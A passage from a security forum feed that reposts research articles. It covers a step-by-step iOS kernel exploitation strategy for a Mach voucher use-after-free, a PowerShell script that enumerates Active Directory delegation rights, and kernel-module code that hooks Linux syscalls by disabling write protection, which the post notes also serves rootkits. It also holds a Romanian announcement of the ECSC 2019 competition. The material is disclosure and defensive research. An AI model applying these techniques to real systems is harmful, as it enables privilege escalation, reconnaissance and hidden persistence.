consuming the reference on the port. If we assume that a correct implementation of the above code doesn't leak or consume extra references, then we can conclude the following intended semantics for semaphore_destroy(): On success, semaphore_destroy() should consume the semaphore reference. On failure, semaphore_destroy() should still consume the semaphore reference. Thus, semaphore_destroy() doesn't seem to follow the traditional rules of MIG semantics: a correct implementation always takes ownership of the semaphore object, regardless of whether the service routine returns success or failure. This of course begs the question: what are the full rules governing MIG semantics? And are there any instances of code violating these other MIG rules? A bad swap Not long into my investigation into extended MIG semantics, I discovered the function task_swap_mach_voucher(). This is the MIG definition from osfmk/mach/task.defs: routine task_swap_mach_voucher( task : task_t; new_voucher : ipc_voucher_t; inout old_voucher : ipc_voucher_t); And here's the relevant code from _Xtask_swap_mach_voucher(), the autogenerated MIG wrapper: mig_internal novalue _Xtask_swap_mach_voucher (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP) { ... kern_return_t RetCode; task_t task; ipc_voucher_t new_voucher; ipc_voucher_t old_voucher; ... task = convert_port_to_task(In0P->Head.msgh_request_port); new_voucher = convert_port_to_voucher(In0P->new_voucher.name); old_voucher = convert_port_to_voucher(In0P->old_voucher.name); RetCode = task_swap_mach_voucher(task, new_voucher, &old_voucher); ipc_voucher_release(new_voucher); task_deallocate(task); if (RetCode != KERN_SUCCESS) { MIG_RETURN_ERROR(OutP, RetCode); } ... if (IP_VALID((ipc_port_t)In0P->old_voucher.name)) ipc_port_release_send((ipc_port_t)In0P->old_voucher.name); if (IP_VALID((ipc_port_t)In0P->new_voucher.name)) ipc_port_release_send((ipc_port_t)In0P->new_voucher.name); ... OutP->old_voucher.name = (mach_port_t)convert_voucher_to_port(old_voucher); OutP->Head.msgh_bits |= MACH_MSGH_BITS_COMPLEX; OutP->Head.msgh_size = (mach_msg_size_t)(sizeof(Reply)); OutP->msgh_body.msgh_descriptor_count = 1; } Once again, assuming that a correct implementation doesn't leak or consume extra references, we can infer the following intended semantics for task_swap_mach_voucher(): task_swap_mach_voucher() does not hold a reference on new_voucher; the new_voucher reference is borrowed and should not be consumed. task_swap_mach_voucher() holds a reference on the input value of old_voucher that it should consume. On failure, the output value of old_voucher should not hold any references on the pointed-to voucher object. On success, the output value of old_voucher holds a voucher reference donated from task_swap_mach_voucher() to _Xtask_swap_mach_voucher() that the latter consumes via convert_voucher_to_port(). With these semantics in mind, we can compare against the actual implementation. Here's the code from XNU 4903.221.2's osfmk/kern/task.c, presumably a placeholder implementation: kern_return_t task_swap_mach_voucher( task_t task, ipc_voucher_t new_voucher, ipc_voucher_t *in_out_old_voucher) { if (TASK_NULL == task) return KERN_INVALID_TASK; *in_out_old_voucher = new_voucher; return KERN_SUCCESS; } This implementation does not respect the intended semantics: The input value of in_out_old_voucher is a voucher reference owned by task_swap_mach_voucher(). By unconditionally overwriting it without first calling ipc_voucher_release(), task_swap_mach_voucher() leaks a voucher reference. The value new_voucher is not owned by task_swap_mach_voucher(), and yet it is being returned in the output value of in_out_old_voucher. This consumes a voucher reference that task_swap_mach_voucher() does not own. Thus, task_swap_mach_voucher() actually contains two reference counting issues! We can leak a reference on a voucher by calling task_swap_mach_voucher() with the voucher as the third argument, and we can drop a reference on the voucher by passing the voucher as the second argument. This is a great exploitation primitive, since it offers us nearly complete control over the voucher object's reference count. (Further investigation revealed that thread_swap_mach_voucher() contained a similar vulnerability, but only the reference leak part, and changes in iOS 12 made the vulnerability unexploitable.) On vouchers In order to grasp the impact of this vulnerability, it's helpful to understand a bit more about Mach vouchers, although the full details aren't important for exploitation. Mach vouchers are represented by the type ipc_voucher_t in the kernel, with the following structure definition: /* * IPC Voucher * * Vouchers are a reference counted immutable (once-created) set of * indexes to particular resource manager attribute values * (which themselves are reference counted). */ struct ipc_voucher { iv_index_t iv_hash; /* checksum hash */ iv_index_t iv_sum; /* checksum of values */ os_refcnt_t iv_refs; /* reference count */ iv_index_t iv_table_size; /* size of the voucher table */ iv_index_t iv_inline_table[IV_ENTRIES_INLINE]; iv_entry_t iv_table; /* table of voucher attr entries */ ipc_port_t iv_port; /* port representing the voucher */ queue_chain_t iv_hash_link; /* link on hash chain */ }; As the comment indicates, an IPC voucher represents a set of arbitrary attributes that can be passed between processes via a send right in a Mach message. The primary client of Mach vouchers appears to be Apple's libdispatch library. The only fields of ipc_voucher relevant to us are iv_refs and iv_port. The other fields are related to managing the global list of voucher objects and storing the attributes represented by a voucher, neither of which will be used in the exploit. As of iOS 12, iv_refs is of type os_refcnt_t, which is a 32-bit reference count with allowed values in the range 1-0x0fffffff (that's 7 f's, not 8). Trying to retain or release a voucher with a reference count outside this range will trigger a panic. iv_port is a pointer to the ipc_port object that represents this voucher to userspace. It gets initialized whenever convert_voucher_to_port() is called on an ipc_voucher with iv_port set to NULL. In order to create a Mach voucher, you can call the host_create_mach_voucher() trap. This function takes a "recipe" describing the voucher's attributes and returns a voucher port representing the voucher. However, because vouchers are immutable, there is one quirk: if the resulting voucher's attributes are exactly the same as a voucher that already exists, then host_create_mach_voucher() will simply return a reference to the existing voucher rather than creating a new one. That's out of line! There are many different ways to exploit this bug, but in this post I'll discuss my favorite: incrementing an out-of-line Mach port pointer so that it points into pipe buffers. Now that we understand what the vulnerability is, it's time to determine what we can do with it. As you'd expect, an ipc_voucher gets deallocated once its reference count drops to 0. Thus, we can use our vulnerability to cause the voucher to be unexpectedly freed. But freeing the voucher is only useful if the freed voucher is subsequently reused in an interesting way. There are three components to this: storing a pointer to the freed voucher, reallocating the freed voucher with something useful, and reusing the stored voucher pointer to modify kernel state. If we can't get any one of these steps to work, then the whole bug is pretty much useless. Let's consider the first step, storing a pointer to the voucher. There are a few places in the kernel that directly or indirectly store voucher pointers, including struct ipc_kmsg's ikm_voucher field and struct thread's ith_voucher field. Of these, the easiest to use is ith_voucher, since we can directly read and write this field's value from userspace by calling thread_get_mach_voucher() and thread_set_mach_voucher(). Thus, we can make ith_voucher point to a freed voucher by first calling thread_set_mach_voucher() to store a reference to the voucher, then using our voucher bug to remove the added reference, and finally deallocating the voucher port in userspace to free the voucher. Next consider how to reallocate the voucher with something useful. ipc_voucher objects live in their own zalloc zone, ipc.vouchers, so we could easily get our freed voucher reallocated with another voucher object. Reallocating with any other type of object, however, would require us to force the kernel to perform zone garbage collection and move a page containing only freed vouchers over to another zone. Unfortunately, vouchers don't seem to store any significant privilege-relevant attributes, so reallocating our freed voucher with another voucher probably isn't helpful. That means we'll have to perform zone gc and reallocate the voucher with another type of object. In order to figure out what type of object we should reallocate with, it's helpful to first examine how we will use the dangling voucher pointer in the thread's ith_voucher field. We have a few options, but the easiest is to call thread_get_mach_voucher() to create or return a voucher port for the freed voucher. This will invoke ipc_voucher_reference() and convert_voucher_to_port() on the freed ipc_voucher object, so we'll need to ensure that both iv_refs and iv_port are valid. But what makes thread_get_mach_voucher() so useful for exploitation is that it returns the voucher's Mach port back to userspace. There are two ways we could leverage this. If the freed ipc_voucher object's iv_port field is non-NULL, then that pointer gets directly interpreted as an ipc_port pointer and thread_get_mach_voucher() returns it to us as a Mach send right. On the other hand, if iv_port is NULL, then convert_voucher_to_port() will return a freshly allocated voucher port that allows us to continue manipulating the freed voucher's reference count from userspace. This brought me to the idea of reallocating the voucher using out-of-line ports. One way to send a large number of Mach port rights in a message is to list the ports in an out-of-line ports descriptor. When the kernel copies in an out-of-line ports descriptor, it allocates an array to store the list of ipc_port pointers. By sending many Mach messages containing out-of-line ports descriptors, we can reliably reallocate the freed ipc_voucher with an array of out-of-line Mach port pointers. Since we can control which elements in the array are valid ports and which are MACH_PORT_NULL, we can ensure that we overwrite the voucher's iv_port field with NULL. That way, when we call thread_get_mach_voucher() in userspace, convert_voucher_to_port() will allocate a fresh voucher port that points to the overlapping voucher. Then we can use the reference counting bug again on the returned voucher port to modify the freed voucher's iv_refs field, which will change the value of the out-of-line port pointer that overlaps iv_refs by any amount we want. Of course, we haven't yet addressed the question of ensuring that the iv_refs field is valid to begin with. As previously mentioned, iv_refs must be in the range 1-0x0fffffff if we want to reuse the freed ipc_voucher without triggering a kernel panic. The ipc_voucher structure is 0x50 bytes and the iv_refs field is at offset 0x8; since the iPhone is little-endian, this means that if we reallocate the freed voucher with an array of out-of-line ports, iv_refs will always overlap with the lower 32 bits of an ipc_port pointer. Let's call the Mach port that overlaps iv_refs the base port. Using either MACH_PORT_NULL or MACH_PORT_DEAD as the base port would result in iv_refs being either 0 or 0xffffffff, both of which are invalid. Thus, the only remaining option is to use a real Mach port as the base port, so that iv_refs is overwritten with the lower 32 bits of a real ipc_port pointer. This is dangerous because if the lower 32 bits of the base port's address are 0 or greater than 0x0fffffff, accessing the freed voucher will panic. Fortunately, kernel heap allocation on recent iOS devices is pretty well behaved: zalloc pages will be allocated from the range 0xffffffe0xxxxxxxx starting from low addresses, so as long as the heap hasn't become too unruly since the system booted (e.g. because of a heap groom or lots of activity), we can be reasonably sure that the lower 32 bits of the base port's address will lie within the required range. Hence overlapping iv_refs with an out-of-line Mach port pointer will almost certainly work fine if the exploit is run after a fresh boot. This gives us our working strategy to exploit this bug: Allocate a page of Mach vouchers. Store a pointer to the target voucher in the thread's ith_voucher field and drop the added reference using the vulnerability. Deallocate the voucher ports, freeing all the vouchers. Force zone gc and reallocate the page of freed vouchers with an array of out-of-line ports. Overlap the target voucher's iv_refs field with the lower 32 bits of a pointer to the base port and overlap the voucher's iv_port field with NULL. Call thread_get_mach_voucher() to retrieve a voucher port for the voucher overlapping the out-of-line ports. Use the vulnerability again to modify the overlapping voucher's iv_refs field, which changes the out-of-line base port pointer so that it points somewhere else instead. Once we receive the Mach message containing the out-of-line ports, we get a send right to arbitrary memory interpreted as an ipc_port. Pipe dreams So what should we get a send right to? Ideally we'd be able to fully control the contents of the fake ipc_port we receive without having to play risky games by deallocating and then reallocating the memory backing the fake port. Ian actually came up with a great technique for this in his multi_path and empty_list exploits using pipe buffers. Our exploit so far allows us to modify an out-of-line pointer to the base port so that it points somewhere else. So, if the original base port lies directly in front of a bunch of pipe buffers in kernel memory, then we can leak voucher references to increment the base port pointer in the out-of-line ports array so that it points into the pipe buffers instead. At this point, we can receive the message containing the out-of-line ports back in userspace. This message will contain a send right to an ipc_port that overlaps one of our pipe buffers, so we can directly read and write the contents of the fake ipc_port's memory by reading and writing the overlapping pipe's file descriptors. tfp0 Once we have a send right to a completely controllable ipc_port object, exploitation is basically deterministic. We can build a basic kernel memory read primitive using the same old pid_for_task() trick: convert our port into a fake task port such that the fake task's bsd_info field (which is a pointer to a proc struct) points to the memory we want to read, and then call pid_for_task() to read the 4 bytes overlapping bsd_info->p_pid. Unfortunately, there's a small catch: we don't know the address of our pipe buffer in kernel memory, so we don't know where to make our fake task port's ip_kobject field point. We can get around this by instead placing our fake task struct in a Mach message that we send to the fake port, after which we can read the pipe buffer overlapping the port and get the address of the message containing our fake task from the port's ip_messages.imq_messages field. Once we know the address of the ipc_kmsg containing our fake task, we can overwrite the contents of the fake port to turn it into a task port pointing to the fake task, and then call pid_for_task() on the fake task port as usual to read 4 bytes of arbitrary kernel memory. An unfortunate consequence of this approach is that it leaks one ipc_kmsg struct for each 4-byte read. Thus, we'll want to build a better read primitive as quickly as possible and then free all the leaked messages. In order to get the address of the pipe buffer we can leverage the fact that it resides at a known offset from the address of the base port. We can call mach_port_request_notification() on the fake port to add a request that the base port be notified once the fake port becomes a dead name. This causes the fake port's ip_requests field to point to a freshly allocated array containing a pointer to the base port, which means we can use our memory read primitive to read out the address of the base port and compute the address of the pipe buffer. At this point we can build a fake kernel task inside the pipe buffer, giving us full kernel read/write. Next we allocate kernel memory with mach_vm_allocate(), write a new fake kernel task inside that memory, and then modify the fake port pointer in our process's ipc_entry table to point to the new kernel task instead. Finally, once we have our new kernel task port, we can clean up all the leaked memory. And that's the complete exploit! You can find exploit code for the iPhone XS, iPhone XR, and iPhone 8 here: voucher_swap. A more in-depth, step-by-step technical analysis of the exploit technique is available in the source code. Bug collision I reported this vulnerability to Apple on December 6, 2018, and by December 19th Apple had already released iOS 12.1.3 beta build 16D5032a which fixed the issue. Since this would be an incredibly quick turnaround for Apple, I suspected that this bug was found and reported by some other party first. I subsequently learned that this bug was independently discovered and exploited by Qixun Zhao (@S0rryMybad) of Qihoo 360 Vulcan Team. Amusingly, we were both led to this bug through semaphore_destroy(); thus, I wouldn't be surprised to learn that this bug was broadly known before being fixed. SorryMybad used this vulnerability as part of a remote jailbreak for the Tianfu Cup; you can read about his strategy for obtaining tfp0. Conclusion This post looked at the discovery and exploitation of P0 issue 1731, an IPC voucher reference counting issue rooted in failing to follow MIG semantics for inout objects. When run a few seconds after a fresh boot, the exploit strategy discussed here is quite reliable: on the devices I've tested, the exploit succeeds upwards of 99% of the time. The exploit is also straightforward enough that, when successful, it allows us to clean up all leaked resources and leave the system in a completely stable state. In a way, it's surprising that such "easy" vulnerabilities still exist: after all, XNU is open source and heavily scrutinized for valuable bugs like this. However, MIG semantics are very unintuitive and don't align well with the natural patterns for writing secure kernel code. While I'd love to believe that this is the last major MIG bug, I wouldn't be surprised to see at least a few more crop up. This bug is also a good reminder that placeholder code can also introduce security vulnerabilities and should be scrutinized as tightly as functional code, no matter how simple it may seem. And finally, it's worth noting that the biggest headache for me while exploiting this bug, the limited range of allowed reference count values, wasn't even an issue on iOS versions prior to 12. On earlier platforms, this bug would have always been incredibly reliable, not just directly after a clean boot. Thus, it's good to see that even though os_refcnt_t didn't stop this bug from being exploited, the mitigation at least impacts exploit reliability, and probably decreases the value of bugs like this to attackers. My next post will show how to use this exploit to analyze Apple's implementation of Pointer Authentication, culminating in a technique that allows us to forge PACs for pointers signed with the A keys. This is sufficient to call arbitrary kernel functions or execute arbitrary code in the kernel via JOP. Posted by Ben at 10:15 AM Sursa: https://googleprojectzero.blogspot.com/2019/01/voucherswap-exploiting-mig-reference.html
  4. Nytro

    Why...???

    Cel mai probabil se trimite un request de scos din blacklist catre ei. Cum si unde? Nu am idee.
  5. Nytro

    Why...???

    Probabil search engine-ul lor a gasit cine stie ce lucruri interesante pe la noi (e.g. cod?) si RST a fost blacklistat.
  6. Da, limita de varsta trebuie respectata. E important: in acest an concursul se va desfasura in Romania si ar fi bine ca Romania sa faca o impresie buna. Recomand tuturor celor pasionati de security sa se inscrie. Cateva detalii despre cum a fost anul trecut sunt disponibile in prezentarea unuia dintre baietii care a participat anul trecut:
  7. S-au deschis înscrierile pentru Campionatul European de Securitate Cibernetică 2019 Recomandat Ioana Tanase Marți, 29 Ianuarie 2019 12:29 La sediul CERT-RO a avut loc o nouă întâlnire dedicată organizării European Cyber Security Championship (ECSC) în România. La întrevedere au participat reprezentanţi ai CERT-RO, SRI şi ANSSI, organizatori tradiţionali ai competiţiei în România, dar şi susţinători sau posibili sponsori din spaţiul public sau privat. Discuţiile s-au concentrat pe organizarea fazei naţionale a competiţiei, precum şi etapa finală din luna octombrie, care va avea loc la Bucureşti. ECSC este un concurs la nivel european, care are ca temă securitatea cibernetică. Proiectul este susţinut anual de către European Union Agency for Network Internet Security (ENISA). În cadrul ECSC, echipele fiecărui stat participant sunt implicate atât în exerciţii de colaborare, cât şi în competiţie. Probele campionatului acoperă domenii precum securitate web, securitate mobilă, puzzleuri criptografice, inginerie inversă şi investigaţii. Concursul are o etapă naţională, prin care se face selecţia echipei României, pregătitoare pentru întrecerea finală, la nivel european. Participanţii care vor să se înscrie în competiţie trebuie să îndeplinească următoarele criterii: vârsta cuprinsă între 16 şi 25 de ani; cetăţeni ai ţării pentru care participă sau locuiesc şi urmează o formă de învăţământ în această ţară. Echipele sunt formate din 2 (maxim 3) antrenori şi maxim 10 concurenţi din 2 categorii: 5 juniori (între 16 şi 20 ani) şi 5 seniori (între 21 şi 25 ani). Vârsta de referinţă este vârsta concurentului la sfarsitul anului calendaristic. În 2018, echipa României a ocupat locul al doilea dintr-un total de 10 ţări participante la ediţia din acest an a Campionatului European de Securitate Cibernetică (ECSC) desfăşurat la Duesseldorf, în Germania, în perioada 7 - 10 noiembrie 2018. Aceasta este cea mai bună performanţă înregistrată de România în cadrul competiţiei europene şi se datorează atât experienţei acumulate în etapa anterioară şi pregătirii susţinute a membrilor echipei pe parcursul acestui an, cât şi dedicării instructorilor care le-au fost alături celor 10 componenţi ai lotului. În acelaşi timp, echipa României s-a bucurat de aprecierea juriului, fiind desemnată pentru al doilea an la rând drept echipa cu cea mai bună expunere a modului în care au rezolvat sarcinile de concurs. Inscriere: http://www.cybersecuritychallenge.ro/ Sursa: https://www.monitoruldegalati.ro/national/s-au-deschis-inscrierile-pentru-campionatul-european-de-securitate-cibernetica-2019.html
  8. ShellcodeCompiler was updated! It uses now @keystone_engine to assemble shellcodes! https://github.com/NytroRST/ShellcodeCompiler
  9. Bug reparat: http://xssfuzzer.com/
  10. Am abuzat de energizante si nu a fost bine. Am renuntat complet la ele. Somnul e baza. Cat se poate, e util din multe puncte de vedere si nicio substanta nu il poate inlocui.
  11. Depinde de tine. Sunt lucruri diferite. Pentester e mai mult pe parte de "atacator" pe cand security analyst e mai mult pe partea de aparare.
  12. Hunting the Delegation Access January 17, 2019 Active Directory (AD) delegation is a fascinating subject, and we have previously discussed it in a blog post and later in a webinar. To summarize, Active Directory has a capability to delegate certain rights to non (domain/forest/enterprise) admin users to perform administrative tasks over a specific section of AD. This capability, if miss-configured, can become a major reason for AD compromise. Earlier we only talked about manual analysis for finding such delegations. Another article which can be found here covered multiple other tools which can help in such manual analysis. Today, we are going to look at other possible options to hunt for these delegations across a network in an (semi-)automated manner via scripts. Setting the scene We’ll assume following scenarios: We have previously compromised a low privilege domain user with severe restrictions such as powershell execution disabled via AppLocker. We have a compromised local admin access on a domain joined machine. This local admin access allows us to run unrestricted powershell scripts however we would require the domain login to perform enumeration on the AD domain. To achieve that, we will use two different approaches: Using AD ACLScanner (Semi Automated) and Using Custom Powershell Script by NSS (Fully Automated) Using ADACLScanner This tool is written by canix1 and is useful for generic ACL scanning. It can be found on github (https://github.com/canix1/ADACLScanner). We can repurpose this tool to perform the tasks of AD delegation hunting. We will explain this process with the help of an example below: When you run a powershell script from ADACLScanner you are greeted with a nice GUI (one of the rare tools in powershell with a nice GUI). ADACLScanner So let’s say, we connect to one of the AD named “plum”, available at 192.168.3.215 as shown in the screenshot below. Connecting to AD When we click on connect in the first column, we will be prompted to enter a domain credential so that it can enumerate the node. It should be noted that this domain credential could be of any low privilege user in the domain. Requesting Domain Credentials Once we enter the domain credentials correctly, we will be shown the available nodes, as shown below. Listing AD Nodes Now all we got to do is highlight the node in the first column, make sure inherited permissions is unticked and click on run scan. In the above scenario we selected the highest node that is “DC=plum,DC=local”. The report that is generated after the scan is completed, will look somewhat as shown below. ACL Scanner Report If we highlight Regions node and run the scan then the report will look somewhat different. You can notice that the Object column in the report is giving you details of the node for which ACL report has been extracted. So the OU here is Regions. ACL Report for Regions OU Similarly if you run scan for the USA OU from objects column as shown below, the report will state the delegation permissions for the OU of USA. AD ACL Scanner report for OU USA The hassle here is that you have to manually hunt every node and then analyze every entry to find the correct delegation. It is fine for a small network but the task may become a nightmare if you are dealing with a large network. This is where our second approach could be useful. Using Custom Powershell Script by NSS Let me first show you the working of this script which has been prepared by our team If you are only concerned about the automated script, here is the online version of it go and grab it. If you are interested in internal working of the script here is a block by block breakdown of the script. Getting User Credentials and AD Drive Hack We started with a non-domain, but local admin user. This is the reason that we get the below listed error whenever we try to mount an AD Drive or import active directory modules. AD Module Import Error To get around this, we passed “-WarningAction SilentlyContinue” parameter. Let us dissect the script, the first bit reads like below: Import-Module ActiveDirectory -WarningAction SilentlyContinue # force use of specified credentials everywhere $creds=Get-Credential $PSDefaultParameterValues = @{"*-AD*:Credential"=$creds} # GET DC Name $dcname=(Get-ADDomainController).Name New-PSDrive -Name AD -PSProvider ActiveDirectory -Server $dcname -Root //RootDSE/ -Credential $creds Set-Location AD: Here is a better understanding of the command listed above: Since we are performing actions as a non domain user, we started by importing “ActiveDirectory” module with “-WarningAction SilentlyContinue”. This allowed us to import the module but the AD Drive was not mounted. Next we attempted to get Credentials from the user. As user credentials were added we then set “PSDefaultParameterValues” for all Commands with “-AD” in them. Now we attempted to mount the AD Drive with this newly acquired credential and for this we needed a server name which we was seamlessly obtained using the “Get-ADDomainController” commandlet. This would not be required if you are already logged in as a domain user. However we wanted to take the worst case scenario where you might have access to a system as a local admin hence unrestricted powershell access but limited domain user credentials. Navigating Entire OU Get all Domain Names, Organization Units, and individual ADObject $OUs = @(Get-ADDomain | Select-Object -ExpandProperty DistinguishedName) $OUs += Get-ADOrganizationalUnit -Filter * | Select-Object -ExpandProperty DistinguishedName $OUs += Get-ADObject -SearchBase (Get-ADDomain).DistinguishedName -SearchScope OneLevel -LDAPFilter '(objectClass=container)' | Select-Object -ExpandProperty DistinguishedName Let us understand what happens here, the first line executes the “Get-ADDomain” and fetches the column of “DistinguishedName”, the second line adds to the OUs object content of “Get-ADOrganizationalUnit” starting filter is “*” and then taking the distinguished name from those objects. The third line fetches the AD objects of AD domain distinguished names, taking only one level with an “LdapFilter” where object class is container and printing out the “DistinguishedName” column. Adding Exclusions $domain = (Get-ADDomain).Name $groups_to_ignore = ( "$domain\Enterprise Admins", "$domain\Domain Admins") # 'NT AUTHORITY\SYSTEM', 'S-1-5-32-548', 'NT AUTHORITY\SELF' These lines show how we are adding more exclusions to the list. We are first fetching the domain name and post that,providing a list of groups to be ignored. Extracting Relevant Domain User/Group Permissions ForEach ($OU in $OUs) { $report += Get-Acl -Path "AD:\$OU" | Select-Object -ExpandProperty Access | ? {$_.IdentityReference -match "$domain*" -and $_.IdentityReference -notin $groups_to_ignore} | Select-Object @{name='organizationalUnit';expression={$OU}}, ` @{name='objectTypeName';expression={if ($_.objectType.ToString() -eq '00000000-0000-0000-0000-000000000000') {'All'} Else {$schemaIDGUID.Item($_.objectType)}}}, ` @{name='inheritedObjectTypeName';expression={$schemaIDGUID.Item($_.inheritedObjectType)}}, ` * } As we saw previously in second step (i.e. during navigation), we stored all the information in the $OUs, now here we are using a “ForEach” loop to extract all the information and process it. The first three lines in the ForEach loop fetches the ACL path of all the entities in the $OUs by ensuring there is a match of “IdentityReference” with the Domain and not a part of the Groups to ignore list. The Groups to ignore list can be seen in step 4. Continuing from Line 4 the command basically selects objects like organizationalUnit with Expression of the entity in the $OUs and “ObjectTypeName” with condition that if the object type is equal to root GUID else fetch the details of the “SchemaIDGUID” based on the object type value. Inheritance == False Inheritance as false is the key to everything. We need only the lines where inheritance is false. $filterrep= $report | Where-Object {-not $_.IsInherited} This ensures that inherited objects are not shown in the output. Array Conversion Array to Console Table Write-Output ( $filterrep | Select-Object OrganizationalUnit,ObjectTypeName,ActiveDirectoryRights,IdentityReference | Format-Table | Out-String) This finally results in a neatly formatted table with list of users having any non-inherited i.e. delegated rights on specific objects. By Default, the delegated rights cascade down the OU tree so if top level OU has the rights, it would automatically cascade down to the next OU section unless and until explicitly removed. Result of Automated Script <shameless plug> This, and other such useful techniques, have been demonstrated in our latest Advanced Infrastructure Hacking course – 2019 edition. We also provide in-house training and CTF’s for internal security and SOC teams to help them advance their skill sets. </shameless plug> Sursa: https://www.notsosecure.com/hunting-the-delegation-access/
  13. How to write a rootkit without really trying POST JANUARY 17, 2019 LEAVE A COMMENT We open-sourced a fault injection tool, KRF, that uses kernel-space syscall interception. You can use it today to find faulty assumptions (and resultant bugs) in your programs. Check it out! This post covers intercepting system calls from within the Linux kernel, via a plain old kernel module. We’ll go through a quick refresher on syscalls and why we might want to intercept them and then demonstrate a bare-bones module that intercepts the read(2) syscall. But first, you might be wondering: What makes this any different from $other_fault_injection_strategy? Other fault injection tools rely on a few different techniques: There’s the well-known LD_PRELOAD trick, which really intercepts the syscall wrapper exposed by libc (or your language runtime of choice). This often works (and can be extremely useful for e.g. spoofing the system time within a program or using SOCKS proxies transparently), but comes with some major downsides: LD_PRELOAD only works when libc (or the target library of choice) has been dynamically linked, but newer languages (read: Go) and deployment trends (read: fully static builds and non-glibc Linux containers) have made dynamic linkage less popular. Syscall wrappers frequently deviate significantly from their underlying syscalls: depending on your versions of Linux and glibc open() may call openat(2), fork() may call clone(2), and other calls may modify their flags or default behavior for POSIX compliance. As a result, it can be difficult to reliably predict whether a given syscall wrapper invokes its syscall namesake. Dynamic instrumentation frameworks like DynamoRIO or Intel PIN can be used to identify system calls at either the function or machine-code level and instrument their calls and/or returns. While this grants us fine-grained access to individual calls, it usually comes with substantial runtime overhead. Injecting faults within kernelspace sidesteps the downsides of both of these approaches: it rewrites the actual syscalls directly instead of relying on the dynamic loader, and it adds virtually no runtime overhead (beyond checking to see whether a given syscall is one we’d like to fault). What makes this any different from $other_blog_post_on_syscall_interception? Other blog posts address the interception of syscalls, but many: Grab the syscall table by parsing their kernel’s System.map, which can be unreliable (and is slower than the approach we give below). Assume that the kernel exports sys_call_table and that extern void *sys_call_table will work (not true on Linux 2.6+). Involve prodding large ranges of kernel memory, which is slow and probably dangerous. Basically, we couldn’t find a recent (>2015) blog post that described a syscall interception process that we liked. So we developed our own. Why not just use eBPF or kprobes? eBPF can’t intercept syscalls. It can only record their parameters and return types. The kprobes API might be able to perform interception from within a kernel module, although I haven’t come across a really good source of information about it online. In any case, the point here is to do it ourselves! Will this work on $architecture? For the most part, yes. You’ll need to make some adjustments to the write-unlocking macro for non-x86 platforms. What’s a syscall? A syscall, or system call, is a function1 that exposes some kernel-managed resource (I/O, process control, networking, peripherals) to user-space processes. Any program that takes user input, communicates with other programs, changes files on disk, uses the system time, or contacts another device over a network (usually) does so via syscalls.2 The core UNIX-y syscalls are fairly primitive: open(2), close(2), read(2), and write(2) for the vast majority of I/O; fork(2), kill(2), signal(2), exit(2), and wait(2) for process management; and so forth. The socket management syscalls are mostly bolted on to the UNIX model: send(2) and recv(2) behave much like read(2) and write(2), but with additional transmission flags. ioctl(2) is the kernel’s garbage dump, overloaded to perform every conceivable operation on a file descriptor where no simpler means exists. Despite these additional complexities in usage, the underlying principle behind their usage (and interception) remains the same. If you’d like to dive all the way in, Filippo Valsorda maintains an excellent Linux syscall reference for x86 and x86_64. Unlike regular function calls in user-space, syscalls are extraordinarily expensive: on x86 architectures, int 80h (or the more modern sysenter/syscall instructions) causes both the CPU and the kernel to execute slow interrupt-handling code paths as well as perform a privilege-context switch.3 Why intercept syscalls? For a few different reasons: We’re interested in gathering statistics about a given syscall’s usage, beyond what eBPF or another instrumentation API could (easily) provide. We’re interested in fault injection that can’t be avoided by static linking or manual syscall(3) invocations (our use case). We’re feeling malicious, and we want to write a rootkit that’s hard to remove from user-space (and possibly even kernel-space, with a few tricks).4 Why do I need fault injection? Fault injection finds bugs in places that fuzzing and conventional unit testing often won’t: NULL dereferences caused by assuming that particular functions never fail (are you sure you always check whether getcwd(2) succeeds?) Are you sure that you’re doing better than systemd? Memory corruption caused by unexpectedly small buffers, or disclosure caused by unexpectedly large buffers Integer over/underflow caused by invalid or unexpected values (are you sure you’re not making incorrect assumptions about stat(2)‘s atime/mtime/ctime fields?) Getting started: Finding the syscall table Internally, the Linux kernel stores syscalls within the syscall table, an array of __NR_syscalls pointers. This table is defined as sys_call_table, but has not been directly exposed as a symbol (to kernel modules) since Linux 2.5. First thing, we need to get the syscall table’s address, ideally without using the System.map file or scanning kernel memory for well-known addresses. Luckily for us, Linux provides a superior interface than either of these: kallsyms_lookup_name. This makes retrieving the syscall table as easy as: 1 2 3 4 5 6 7 8 9 10 11 12 static unsigned long *sys_call_table; int init_module(void) { sys_call_table = (void *)kallsyms_lookup_name("sys_call_table"); if (sys_call_table == NULL) { printk(KERN_ERR "Couldn't look up sys_call_table\n"); return -1; } return 0; } Of course, this only works if your Linux kernel was compiled with CONFIG_KALLSYMS=1. Debian and Ubuntu provide this, but you may need to test in other distros. If your distro doesn’t enable kallsyms by default, consider using a VM for one that does (you weren’t going to test this code on your host, were you?). Injecting our replacement syscalls Now that we have the kernel’s syscall table, injecting our replacement should be as easy as: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 static unsigned long *sys_call_table; static typeof(sys_read) *orig_read; /* asmlinkage is important here -- the kernel expects syscall parameters to be * on the stack at this point, not inside registers. */ asmlinkage long phony_read(int fd, char __user *buf, size_t count) { printk(KERN_INFO "Intercepted read of fd=%d, %lu bytes\n", fd, count); return orig_read(fd, buf, count); } int init_module(void) { sys_call_table = (void *)kallsyms_lookup_name("sys_call_table"); if (sys_call_table == NULL) { printk(KERN_ERR "Couldn't look up sys_call_table\n"); return -1; } orig_read = (typeof(sys_read) *)sys_call_table[__NR_read]; sys_call_table[__NR_read] = (void *)&phony_read; return 0; } void cleanup_module(void) { /* Don't forget to fix the syscall table on module unload, or you'll be in * for a nasty surprise! */ sys_call_table[__NR_read] = (void *)orig_read; } …but it isn’t that easy, at least not on x86: sys_call_table is write-protected by the CPU itself. Attempting to modify it will cause a page fault (#PF) exception.5 To get around this, we twiddle the 16th bit of the cr0 register, which controls the write-protect state: 1 2 3 4 5 6 #define CR0_WRITE_UNLOCK(x) \ do { \ write_cr0(read_cr0() & (~X86_CR0_WP)); \ x; \ write_cr0(read_cr0() | X86_CR0_WP); \ } while (0) Then, our insertions become a matter of: 1 2 3 CR0_WRITE_UNLOCK({ sys_call_table[__NR_read] = (void *)&phony_read; }); and: 1 2 3 CR0_WRITE_UNLOCK({ sys_call_table[__NR_read] = (void *)orig_read; }); and everything works as expected…almost. We’ve assumed a single processor; there’s an SMP-related race condition bug in the way we twiddle cr0. If our kernel task were preempted immediately after disabling write-protect and placed onto another core with WP still enabled, we’d get a page fault instead of a successful memory write. The chances of this happening are pretty slim, but it doesn’t hurt to be careful by implementing a guard around the critical section: 1 2 3 4 5 6 7 8 9 10 11 12 13 #define CR0_WRITE_UNLOCK(x) \ do { \ unsigned long 